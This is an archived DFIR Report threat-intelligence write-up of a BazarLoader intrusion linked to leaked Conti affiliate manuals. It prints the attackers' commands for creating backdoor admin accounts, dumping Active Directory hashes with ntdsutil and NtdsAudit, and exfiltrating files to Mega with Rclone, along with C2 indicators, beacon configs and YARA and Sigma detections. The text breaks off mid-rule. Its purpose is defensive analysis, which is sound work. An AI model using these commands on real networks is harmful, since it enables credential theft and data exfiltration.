{
	"id": "aebff5d1-6a71-4e93-8120-ec1832fdcc95",
	"created_at": "2026-04-06T00:15:22.723518Z",
	"updated_at": "2026-04-10T03:37:23.857551Z",
	"deleted_at": null,
	"sha1_hash": "297f62e26c67ffacef5e08e21f9e227d2a2b19bd",
	"title": "BazarLoader and the Conti Leaks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2207936,
	"plain_text": "BazarLoader and the Conti Leaks\r\nBy editor\r\nPublished: 2021-10-04 · Archived: 2026-04-05 21:13:15 UTC\r\nIntro\r\nIn July, we observed an intrusion that started from a BazarLoader infection and lasted approximately three days. The threat actor’s main priority was to map the domain network while looking for interesting data to exfiltrate. Their preferred method of operation was through GUI applications such as RDP and AnyDesk.\r\nHistorically, BazarLoader was used to deploy Ryuk, as we reported on many occasions. In one of our latest reports, we saw BazarLoader result in the deployment of Conti ransomware.\r\nCase Summary\r\nIn this case, we did not see the exact initial access vector, but based on other reports at the time we assess with medium to high confidence that a malicious email campaign delivering macro-enabled Word documents was the delivery vector. Shortly after the initial BazarLoader execution, we observed the first discovery commands using the standard built-in Microsoft utilities (net view, net group, nltest). We saw the BazarLoader process download and execute the first Cobalt Strike beacon twenty minutes later using rundll32.\r\nAs the operators tried to enumerate the network, they mistyped a lot of their commands. During interactive discovery tasks via the Cobalt Strike beacon, the threat actors attempted an unusual command that had us scratching our heads for a while: “av_query”. At the time, we were not aware of the reason for or the purpose of this command.\r\nOn August 5th, a threat actor going by the name “m1Geelka” leaked multiple documents that contained instructions, tools and “training” materials to be used by affiliates of Conti ransomware. We demonstrated some of the documents in one of our recent tweet threads; more info about the Conti leak is here. 
In these materials, we found a file called “AVquery.cna” that refers to a Cobalt Strike aggressor script for identifying AV on the target systems. It is likely that the threat actors in this intrusion meant to use this aggressor script via their Cobalt Strike console, but instead typed or pasted “av_query” into their Windows command prompt session. Additionally, the threat actors were seen following the instructions of the leaked documents step by step. More specifically, we observed them copy/pasting the exact commands, such as creating local admin users with the same passwords we saw in the leaked instructions.\r\nContinuing with the discovery phase, the threat actors executed AdFind via a batch script before further enumerating using native Windows tools and port scanning via the Cobalt Strike beacon. They then successfully escalated privileges by dumping credentials from the LSASS process. After having enough situational awareness over the domain and an administrator’s account in their possession, the operators used a reverse proxy and established an RDP connection on the beachhead host. Moments later, we observed them move laterally for the first time to the Domain Controller using RDP.\r\nOnce on the Domain Controller, they again downloaded and executed AdFind through the same batch script. They also ran two separate Cobalt Strike beacons. As if their presence was not enough with Cobalt Strike and administrator credentials, they proceeded to create two local administrator accounts.\r\nNext, they installed AnyDesk, a remote access application for RDP connectivity and remote system control. After establishing four different types of persistence, they felt it was enough and continued enumerating the network, only this time they searched for valuable documents across all domain-joined hosts. To accomplish that, they used PowerSploit and, more specifically, the “Invoke-ShareFinder” module. 
While waiting for their script to finish, the threat actors created a full backup of Active Directory in “IFM” media mode and dumped the password hashes along with the corresponding users. This method is both stealthier and safer for extracting the hashes from Active Directory, as explained by Black Hills Information Security.\r\nThe next step for the threat actors was to download and run “Advanced IP Scanner” and scan ranges looking for other active subnets on the LAN. After four hours of downtime, the operators returned to the network and did something unexpected: they used Seatbelt to enumerate the domain controller further. They then pivoted over to another domain controller, repeated all the above discovery steps, and ran the same tools as on the first domain controller.\r\nEventually, this intrusion ended on the third day from the initial BazarLoader execution. After almost a day of inactivity, the operators logged into the network and used RDP to remote into file servers that contained valuable data. They then created a directory called Shares$ and used Rclone to exfiltrate the data to the Mega Fileshare service. Typically, these types of cases end up with Conti ransomware; however, the threat actors were evicted from the network before a final suspected ransomware deployment commenced.\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 1 of 21\n\nServices\r\nWe offer multiple services, including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, BazarLoader, etc. 
More information on this service and others can be found here.\r\nThree of the Cobalt Strike servers from this case were added to the Threat Feed on 7/19 and the other two were added on 7/29.\r\nWe also have artifacts and IOCs available from this case, such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nWe assess with medium to high confidence that the initial access was the result of a malicious, macro-enabled Word document that was sent as an attachment to the targets of a phishing campaign.\r\nBrad reported on similar BazarLoader activity initiated from a malicious TA551 Word Doc email campaign that resulted in Cobalt Strike beacons.\r\nExecution\r\nThe initial execution for this intrusion took place with the use of BazarLoader malware via rundll32.\r\nImmediately after the execution, the malware contacted two of its C2 IPs:\r\n35.165.197.209|443\r\n3.101.57.185|443\r\nWe then observed the threat actor using the BazarLoader-injected process, svchost.exe, to download Cobalt Strike and save it under:\r\nC:\\Users\\\u003cuser\u003e\\Appdata\\Local\\Temp\r\nbefore executing it using rundll32.exe.\r\nThroughout the intrusion, the threat actors utilized Cobalt Strike beacons and PowerShell to execute their payloads prior to interactively remoting into hosts using RDP and AnyDesk.\r\nPersistence\r\nThe threat actors created two local user accounts on the first Domain Controller. They also added one of the two to the local administrators group. 
The passwords that they used were the same as the passwords in the recently leaked Conti documents.\r\nScreenshot from leaked Conti data (“Закреп\\ AnyDesk.txt”) (our tweet thread on Conti leak manuals):\r\nCommands from the intrusion:\r\nnet user sqlbackup qc69t4b#z0ke3 /add\r\nnet user localadmin qc69t4b#z0ke3 /add\r\nnet localgroup administrators localadmin /add\r\nAnyDesk was also installed on the main domain controller.\r\nThe threat actors maintained an open communication channel through AnyDesk for a period of 11 hours.\r\nThe threat actor was seen logging in from 185.220.100.242 (Tor Exit Node) using AnyDesk. Client ID 776934005. (ad_svc.trace)\r\nPrivilege Escalation\r\nThe threat actors accessed credentials for an administrator account from the LSASS process using the Cobalt Strike beacon. In the image below, we can see that the CS beacon process is injected into LSASS.\r\nDefense Evasion\r\nThroughout the intrusion, we observed multiple instances of process injection from both the initial BazarLoader malware and Cobalt Strike beacons.\r\nAfter BazarLoader was loaded in memory, it almost immediately injected into the svchost.exe process. Additionally, the Cobalt Strike beacon was injected into mstsc.exe, searchindexer.exe and rundll32.exe and ran various tasks from these processes.\r\nCredential Access\r\nThe LSASS process was accessed by an unusual process, “searchindexer.exe”, on the beachhead right before the lateral movement was observed. Searchindexer.exe is a legitimate Windows process responsible for the indexing of files for Windows searches.\r\nThis technique is known to be used by Cobalt Strike, which injects malicious code into a newly spawned searchindexer process to evade detection. 
This is associated with MITRE ATT\u0026CK (r) Tactic(s): Defense Evasion and Technique(s): T1036.004.\r\nThe Sysmon logs captured in our case, shown below, can be used to detect this type of activity.\r\nSysmon Event ID: 10\r\nDescription: Process Access\r\nSourceImage: C:\\Winows\\System32\\SearchIndexer.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x21410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d2e4|C:\\Windows\\System32\\KERNELBASE.dll+2bcee|C:\\Program Files\\Common Files\\Micr\r\nThe threat actors created a full backup of the Active Directory in “IFM” media mode and dumped the password hashes along with the corresponding users.\r\nntdsutil \"ac in ntds\" \"ifm\" \"create full c:\\windows\\temp\\crashpad\\x\" q q\r\nThey also employed the NtdsAudit tool immediately after using ntdsutil to dump the password hashes of all domain users. NtdsAudit requires the “ntds.dit” database file and the SYSTEM registry file for extracting the password hashes and usernames. After providing these as arguments, they exported the password hashes to a file that they named “pwdump.txt” and the user details to a CSV file called “users.csv”. 
After obtaining the password hashes, the threat actors can crack them using a program such as hashcat.\r\nntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv\r\nDiscovery\r\nA few minutes after the initial execution, BazarLoader ran some discovery tasks using the built-in Microsoft net and nltest utilities and transferred the results over the C2 channel.\r\nnet view /all\r\nnet view /all /domain\r\nnltest /domain_trusts /all_trusts\r\nnet localgroup \"administrator\" (comment: command mistyped)\r\nnet group \"domain admins\" /dom\r\nLater on, hands-on operators carried out some additional network and domain reconnaissance from the Cobalt Strike beacon. Again, built-in utilities were favored, with the exception of what we assess was a fat finger or mis-paste by the threat actor, entering a command they meant to execute in their Cobalt Strike console into the Windows command terminal.\r\nipconfig /all\r\nnltest /dclist\r\nnet group \"Domain Admins\" /dom\r\ntasklist\r\nav_query (comment: not a valid command)\r\nnet localgroup Administrateurs (comment: French translation of the named group Administrators)\r\nnet localgroup Administrators\r\nSYSTEMINFO\r\nThe threat actors executed AdFind multiple times on both the beachhead and the domain controllers through a well-known script called adf.bat.\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -f \"(objectcategory=organizationalunit)\"\r\nadfind.exe -sc trustdmp\r\nadfind.exe -subnets -f (objectcategory=subnet)\r\nadfind.exe -f \"(objectcategory=group)\"\r\nadfind.exe -gcb -sc trustdmp\r\nLater on, during the first day of the intrusion, and before we saw the threat actors pivot laterally to the domain controller, they ensured the information that they had collected was accurate by running the below enumeration commands:\r\nnet 
use\r\nipconfig /all\r\nnetstat -ano\r\nnet group \"domain admins\" /domain\r\nnet view \"Domain Controller name\"\r\nnet view \"Second Domain Controller name\"\r\nping \"Domain Controller IP\"\r\nping \"Domain Controller name\"\r\nping \"Second Domain Controller name\"\r\nping \"Domain Controller IPv6\"\r\necho %%username%%\r\narp -a\r\ntime\r\ndate\r\nThe threat actor dropped and ran a script named ping.bat. Here’s an example:\r\nping -n 1 hostname \u003e\u003e C:\\programdata\\log.txt\r\nping -n 1 hostname2 \u003e\u003e C:\\programdata\\log.txt\r\nping -n 1 hostname3 \u003e\u003e C:\\programdata\\log.txt\r\nThe threat actors utilized Advanced IP Scanner to scan for open ports.\r\nOne of the first things that the attackers did once on the first domain controller was to execute Invoke-ShareFinder from PowerSploit via PowerShell ISE. They did the same thing later on the second domain controller.\r\n\"Command\": \"Get-NetCurrentUser\"\r\n\"Command\": \"Get-NetDomain\"\r\n\"Command\": \"Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\\ProgramData\\shares.txt\"\r\nOther Microsoft AD management PowerShell modules were also invoked by the threat actors for discovery tasks.\r\nGet-ADDomainController\r\nGet-ADDomainController -Filter * | ft\r\nGet-ADComputer -Filter * -Properties * | Get-Member\r\nGet-ADDomain\r\nFrom the Domain Controller, the threat actor also ran a Seatbelt binary, which was also seen in the Conti leak documents. This utility performs a number of “safety checks” on a host, telling the user about things like installed AV, network drives, local users, and much more.\r\nWe also noticed the threat actors searching for any existing antivirus software on the domain controller. 
They ran “dir” on the “c:\\Program Files\\” folder and saved the findings in the AV.txt file using a script named av.bat. The script looked similar to the below:\r\ndir \"\\\\hostname\\c$\\Program Files\\* \u003e\u003e C:\\programdata\\AV.txt\r\ndir \"\\\\hostname2\\c$\\Program Files\\* \u003e\u003e C:\\programdata\\AV.txt\r\ndir \"\\\\hostname3\\c$\\Program Files\\* \u003e\u003e C:\\programdata\\AV.txt\r\nLateral Movement\r\nMany hours after the initial compromise, we observed the threat actors using RDP to connect to the first domain controller. They used a reverse proxy via the Cobalt Strike C2 to initiate the RDP connection, and for that reason the operator’s real hostname was captured in event ID 4624:\r\nCollection\r\nPrior to exfiltrating the data, the operators staged it under a directory called “Shares” on each file server. They then inspected the documents they collected prior to exfiltrating them to Mega storage servers using the Rclone application.\r\nCommand and Control\r\nBazarLoader’s initial communication with the C2 is over HTTPS. 
Data is sent to the C2 via the cookie parameter (screenshot taken from https://tria.ge/210716-v4jh8hf6ea/behavioral2).\r\nTwenty minutes after the initial execution, BazarLoader downloaded and executed a Cobalt Strike beacon with the help of rundll32.exe.\r\nThe AnyDesk software installed by the threat actors maintained a constant connection to the AnyDesk infrastructure for the duration of the intrusion.\r\nAnyDesk:\r\n143.244.61.217:443\r\nJA3: c91bde19008eefabce276152ccd51457\r\nJA3s: 107030a763c7224285717ff1569a17f3\r\nCertificate: [18:42:fd:a1:39:29:33:47:44:65:bc:a2:d6:73:a8:c5:c9:35:9a:f3 ]\r\nNot Before: 2014/04/11 02:37:55 UTC\r\nNot After: 2024/04/08 02:37:55 UTC\r\nIssuer Org: philandro Software GmbH\r\nSubject Common: anynet root ca\r\nSubject Org: philandro Software GmbH\r\nPublic Algorithm: rsaEncryption\r\nCertificate: [9e:08:d2:58:a9:02:cd:4f:e2:4a:26:b8:48:5c:43:0b:81:29:99:e3 ]\r\nNot Before: 2018/11/18 02:14:23 UTC\r\nNot After: 2028/11/15 02:14:23 UTC\r\nIssuer Org: philandro Software GmbH\r\nSubject Common: anynet relay\r\nSubject Org: philandro Software GmbH\r\nPublic Algorithm: id-ecPublicKey Curve prime256v1\r\nSome network oddities appeared several times during the course of the intrusion. One of those oddities was several connections across the intrusion to an XMPP chat server at chatterboxtown.us at 70.35.205.161. These connections originated from one of the Cobalt Strike processes over port 5222. The goal of this traffic was not discovered in the course of the investigation.\r\nAnother was a brief SSH connection to a server on the internet using PuTTY. The connection took place for a period of twenty minutes. The reason for this connection is unknown. 
According to public records, the IP is associated with an old Cobalt Strike C2 server.\r\nBazarLoader:\r\n35.165.197.209:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [df:f6:ef:75:f8:f5:c8:8c:1a:4b:49:fd:29:99:d8:58:d0:9c:17:b0 ]\r\nNot Before: 2021/07/13 11:58:09 UTC\r\nNot After: 2022/07/13 11:58:09 UTC\r\nIssuer Org: NN Fern\r\nSubject Common: forenzik.kz\r\nSubject Org: NN Fern\r\nPublic Algorithm: rsaEncryption\r\n3.101.57.185:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [71:9c:ce:11:b3:f0:ea:6f:1e:0f:ff:0f:b4:34:ec:bb:6c:aa:35:40 ]\r\nNot Before: 2021/07/13 11:58:21 UTC\r\nNot After: 2022/07/13 11:58:21 UTC\r\nIssuer Org: NN Fern\r\nSubject Common: forenzik.kz\r\nSubject Org: NN Fern\r\nPublic Algorithm: rsaEncryption\r\n54.177.153.230:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [a1:ab:fe:d6:e4:5a:23:14:dd:8b:67:54:1d:8e:85:b1:c6:10:4a:3f ]\r\nNot Before: 2021/07/13 11:58:22 UTC\r\nNot After: 2022/07/13 11:58:22 UTC\r\nIssuer Org: NN Fern\r\nSubject Common: forenzik.kz\r\nSubject Org: NN Fern\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike:\r\nyawero.com (45.153.240.234:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]\r\nNot Before: 2021/06/02 00:00:00 UTC\r\nNot After: 2022/06/02 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: sazoya.com [sazoya.com ,www.sazoya.com ]\r\nPublic Algorithm: rsaEncryption\r\nsazoya.com (23.106.160.77:443) This Cobalt Strike server was added to our Threat Feed on 07/29/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: 
ae4edc6faf64d08308082ad26be60767\r\nCertificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]\r\nNot Before: 2021/06/02 00:00:00 UTC\r\nNot After: 2022/06/02 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: sazoya.com [sazoya.com ,www.sazoya.com ]\r\nPublic Algorithm: rsaEncryption\r\nsazoya.com (192.198.86.130:443) This Cobalt Strike server was added to our Threat Feed on 07/29/2021. The IP appeared previously tied to a different domain on 05/11/2021.\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]\r\nNot Before: 2021/06/02 00:00:00 UTC\r\nNot After: 2022/06/02 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: sazoya.com [sazoya.com ,www.sazoya.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n \"x64\": {\r\n \"md5\": \"9ea3a4b4bf64aeaefb60ada634f7fb43\",\r\n \"sha1\": \"3e12312e43f4b84129023057862ee3934ca24c6d\",\r\n \"time\": 1627455897000.6,\r\n \"sha256\": \"43ecc44566a599a1f5d5b5063f27fd18b34e0dc67e053570e9ad944ad3f16024\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"HTTP Method Path 2\": \"/ro\",\r\n \"Jitter\": 14,\r\n \"C2 Server\": \"yawero.com,/skin.js,sazoya.com,/skin.js,192.198.86.130,/skin.js\",\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Method 2\": \"POST\",\r\n \"Polling\": 5000,\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\"\r\n },\r\n \"uri_queried\": \"/IMXo\"\r\n },\r\n \"x86\": {\r\n \"md5\": \"d2bb4366b7018e0ed3e7f752fc312371\",\r\n \"sha1\": \"0dfc5ef1947a29227d994a44f33c1b0fe12598ea\",\r\n \"time\": 1627455891592.5,\r\n \"sha256\": \"01b164f74bde4eb7c7da8c6cd707f23ce1923da49a3deb36aea5cd6e3030c0d6\",\r\n \"config\": {\r\n \"Spawn To 
x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"HTTP Method Path 2\": \"/groupcp\",\r\n \"Jitter\": 14,\r\n \"C2 Server\": \"yawero.com,/skin.js,sazoya.com,/skin.js,192.198.86.130,/skin.js\",\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Method 2\": \"POST\",\r\n \"Polling\": 5000,\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\"\r\n },\r\n \"uri_queried\": \"/PJkW\"\r\n }\r\n}\r\nCobalt Strike:\r\ngojihu.com (23.106.215.61:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [1f:1c:7a:7d:0c:9d:cd:dd:47:2f:a9:e5:ac:c8:ae:da:70:29:02:81 ]\r\nNot Before: 2021/07/04 00:00:00 UTC\r\nNot After: 2022/07/04 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: yuxicu.com [yuxicu.com ,www.yuxicu.com ]\r\nPublic Algorithm: rsaEncryption\r\nyuxicu.com (23.82.19.173:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [1f:1c:7a:7d:0c:9d:cd:dd:47:2f:a9:e5:ac:c8:ae:da:70:29:02:81 ]\r\nNot Before: 2021/07/04 00:00:00 UTC\r\nNot After: 2022/07/04 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: yuxicu.com [yuxicu.com ,www.yuxicu.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n \"x86\": {\r\n \"uri_queried\": \"/HjIa\",\r\n \"md5\": \"742844254840eff409535494ae3ec338\",\r\n \"config\": {\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\",\r\n \"C2 Server\": \"gojihu.com,/fam_cart.js,yuxicu.com,/fam_cart.js\",\r\n \"HTTP Method Path 2\": \"/case\",\r\n \"Port\": 443,\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\mstsc.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To 
x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n \"Polling\": 5000,\r\n \"Jitter\": 32,\r\n \"Watermark\": 1580103814\r\n },\r\n \"sha256\": \"8c7e32178cf437f4fd3d7f706066831fce2cd9bc7e2050a3cefebab05952266d\",\r\n \"time\": 1627787111212.2,\r\n \"sha1\": \"46f33bb1c629cedb52fc5d7e46525ac5ccb13aaa\"\r\n },\r\n \"x64\": {\r\n \"uri_queried\": \"/4Ovd\",\r\n \"md5\": \"1e788b5d1ff62688cfe5d2ef7832712a\",\r\n \"config\": {\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\",\r\n \"C2 Server\": \"gojihu.com,/fam_cart.js,yuxicu.com,/fam_cart.js\",\r\n \"HTTP Method Path 2\": \"/case\",\r\n \"Port\": 443,\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\mstsc.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n \"Polling\": 5000,\r\n \"Jitter\": 32,\r\n \"Watermark\": 1580103814\r\n },\r\n \"sha256\": \"43ac1418825ccbe33ae34c64fd036f23ef066073e4fefa2a410b53922cfc815f\",\r\n \"time\": 1627787113671.1,\r\n \"sha1\": \"d4d88b60150088041fec4951335128031441bc5a\"\r\n }\r\n}\r\nExfiltration\r\nAs the threat actors were perusing files, we received a notification that one of our files had been remotely opened from 46.38.235.14.\r\nThe threat actors later exfiltrated sensitive documents from domain-joined file servers using the Rclone application. The destination of the exfiltrated data was Mega.io.\r\nThe above command was copied and pasted by the threat actors to exfiltrate the data. Prior to the correct command, the threat actors accidentally pasted a command from a previous intrusion. 
That command contained a different victim organization in the arguments, showing the continued sloppiness of the threat actor throughout the intrusion.\r\nrclone.exe copy --max-age 3y \"\\\\\u003credacted\u003e\\C$\\Shares\" remote: \u003credacted\u003e\\\u003credacted\u003e --bwlimit 2M -q --ignore-existing --au\r\nBreaking down the Rclone command line arguments:\r\n- copy: Copy the source to the destination\r\n- --max-age: Only transfer files younger than \u003ctime\u003e\r\n- \"\\\\\u003credacted\u003e\\C$\\Shares\": From source\r\n- remote: \u003credacted\u003e\\\u003credacted\u003e: To destination folder\r\n- --bwlimit 2M: Bandwidth limit\r\n- -q: Quiet\r\n- --ignore-existing: Skip all files that exist on destination\r\n- --auto-confirm: Do not request console confirmation\r\n- --multi-thread-streams: Max number of streams to use for multi-thread downloads\r\n- --transfers: Number of file transfers to run in parallel\r\n- -P: Show progress\r\nReference:\r\nhttps://rclone.org/flags/\r\nhttps://rclone.org/commands/rclone_copy/\r\nA great reference for detecting Rclone data exfiltration is the article from nccgroup: Detecting Rclone – An Effective Tool for Exfiltration – and from Red Canary – Transferring Leverage in a Ransomware Attack.\r\nImpact\r\nMultiple sensitive files were exfiltrated, but before the threat actors could take any further action inside the network, they were evicted from the network. 
BazarLoader infections currently tend to materialize into Conti ransomware, and many of the TTPs of the infection mimic the instructions from the leaked Conti manual.\r\nInformation posted by @AltShiftPrtScn based on an IR engagement where the threat actors already had domain admin on the network two months prior to meeting their final objectives.\r\nIOCs\r\nDetections\r\nNetwork\r\nET TROJAN Observed Malicious SSL Cert (BazaLoader CnC)\r\nET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)\r\nET POLICY IP Check Domain (myexternalip .com in TLS SNI)\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET POLICY HTTP 
POST to MEGA Userstorage\r\nSigma\r\nDetects execution of Net.exe, whether suspicious or benign – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml\r\nSuspicious AdFind Execution – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml\r\nAD Privileged Users or Groups Reconnaissance – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_account_discovery.yml\r\nDridex Process Pattern – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_malware_dridex.yml\r\nDomain Trust Discovery – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml\r\nInvocation of Active Directory Diagnostic Tool (ntdsutil.exe) – https://github.com/NVISOsecurity/sigma-public/blob/master/rules/windows/process_creation/win_susp_ntdsutil.yml\r\nAdvanced IP Scanner – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_advanced_ip_scanner.yml\r\nLocal Accounts Discovery – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_local_system_owner_account_discovery.yml\r\nNet.exe User Account Creation – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_net_user_add.yml\r\nRundll32 Internet Connection – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_ne\r\nMalicious PowerShell Commandlets – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_malicious_commandlets.yml\r\nSuspicious Svchost Process – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_svchost.yml\r\nRclone Execution via Command Line or PowerShell 
– https://gist.github.com/beardofbinary/fede0607e830aa1add8deda3d59d9a77#file-rclone_execution-yaml\r\nDNS Query for MEGA.io Upload Domain – https://gist.github.com/beardofbinary/d46c3b4e37ba8b21a79a63fbf69c6411#file-mega_dns_lookup-yaml\r\nYara\r\nrule informational_AnyDesk_Remote_Software_Utility {\r\n meta:\r\n description = \"files - AnyDesk.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"9eab01396985ac8f5e09b74b527279a972471f4b97b94e0a76d7563cf27f4d57\"\r\n strings:\r\n $x1 = \"C:\\\\Buildbot\\\\ad-windows-32\\\\build\\\\release\\\\app-32\\\\win_loader\\\\AnyDesk.pdb\" fullword ascii\r\n $s2 = \"release/win_6.3.x\" fullword ascii\r\n $s3 = \"16eb5134181c482824cd5814c0efd636\" fullword ascii\r\n $s4 = \"b1bfe2231dfa1fa4a46a50b4a6c67df34019e68a\" fullword ascii\r\n $s5 = \"Z72.irZ\" fullword ascii\r\n $s6 = \"ysN.JTf\" fullword ascii\r\n $s7 = \",;@O:\\\"\" fullword ascii\r\n $s8 = \"ekX.cFm\" fullword ascii\r\n $s9 = \":keftP\" fullword ascii\r\n $s10 = \"\u003eFGirc\" fullword ascii\r\n $s11 = \"\u003e-9 -D\" fullword ascii\r\n $s12 = \"% /m_v?\" fullword ascii\r\n $s13 = \"?\\\\+ X5\" fullword ascii\r\n $s14 = \"Cyurvf7\" fullword ascii\r\n $s15 = \"~%f_%Cfcs\" fullword ascii\r\n $s16 = \"wV^X(P+ \" fullword ascii\r\n $s17 = \"\\\\Ej0drBTC8E=oF\" fullword ascii\r\n $s18 = \"W00O~AK_=\" fullword ascii\r\n $s19 = \"D( -m}w\" fullword ascii\r\n $s20 = \"avAoInJ1\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 11000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule cobalt_strike_dll21_5426 {\r\n meta:\r\n description = \"files - 21.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98\"\r\n strings:\r\n $s1 = \"AWAVAUATVWUSH\" fullword ascii\r\n $s2 = \"UAWAVVWSPH\" fullword ascii\r\n $s3 = \"AWAVAUATVWUSPE\" fullword ascii\r\n $s4 = \"UAWAVATVWSH\" fullword ascii\r\n $s5 = \"AWAVVWUSH\" fullword ascii\r\n $s6 = \"UAWAVAUATVWSH\" fullword ascii\r\n $s7 = \"AVVWSH\" fullword ascii\r\n $s8 = \"m1t6h/o*i-j2p2g7i0r.q6j3p,j2l2s7p/s9j-q0f9f,i7r2g1h*i8r5h7g/q9j4h*o7i4r9f7f3g*p/q7o1e5n8m1q4n.e+n0i*r/i*k2q-g\r\n $s9 = \"s-e6m/f-g*j.i8p1g6j*i,o1s9o5f8r-p1l1k4o9n9l-s7q8g+n,f4t0q,f6n9q5s5e6i-f*e6q-r6g8s1o6r0k+h6p9i4f6p4s6l,g0p1j6l\r\n $s10 = \"o1s1s9i2s.f1g5l6g5o2k8h*e9j2o3k0j1f+n,k9h5l*e8p*s2k5r3j-f5o-f,g+e*s-e9h7e.t0e-h3e2t1f8j5k/m9p6n/j3h9e1k3h.t6\r\n $s11 = \"k7s9g7m5k4s5o3h6k.s1p.h9k.s-o8e*f5n9r,l4f-s5k3p2f/n1r.i*f*n-p4s3e7m9p2t/e3m5g1s9e0m1q/j*e*m-r*i+h.p9s2f6h-p5\r\n $s12 = \"k9g9o0t1s4k*k*h.s-p-k.h-m1k*f4h0j7f6n,i5g-n3h+l3n1j7j0e*n5r6r-i9i/e1q4m6i3e2o8j9h9e0m.r-i9m*t4j/r.o*l8m4i.t5\r\n $s13 = \"s6k9n/j.s4s5g2p6s.k1t/j6s,s-g*p.n6f9m/g.n4n5j2q6n.f1p/g6n,n-j*q.m6e9o/h.m4m5i2r6m.e1p/h6m,m-i*r.p6h9m/e.p4p5\r\n $s14 